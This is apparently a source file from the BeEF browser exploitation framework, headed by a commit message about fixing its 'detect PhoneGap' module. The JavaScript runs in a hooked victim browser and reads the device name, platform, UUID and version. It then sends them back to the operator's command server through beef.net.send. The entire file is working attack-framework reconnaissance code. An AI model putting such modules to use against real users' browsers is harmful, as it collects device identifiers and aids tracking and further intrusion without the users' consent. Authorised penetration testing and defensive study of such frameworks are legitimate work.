o Fixed bug in the Detect PhoneGap module o No longer fails to return if PhoneGap is not present o Some minor module name and description updates
22 lines
495 B
JavaScript
22 lines
495 B
JavaScript
//
|
|
// detect phonegap
|
|
//
|
|
beef.execute(function() {
|
|
|
|
var phonegap_details;
|
|
|
|
try {
|
|
phonegap_details = ""
|
|
+ " name: " + device.name
|
|
+ " phonegap api: " + device.phonegap
|
|
+ " platform: " + device.platform
|
|
+ " uuid: " + device.uuid
|
|
+ " version: " + device.version;
|
|
} catch(e) {
|
|
phonegap_details = "unable to detect phonegap";
|
|
}
|
|
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, "phonegap="+phonegap_details);
|
|
|
|
});
|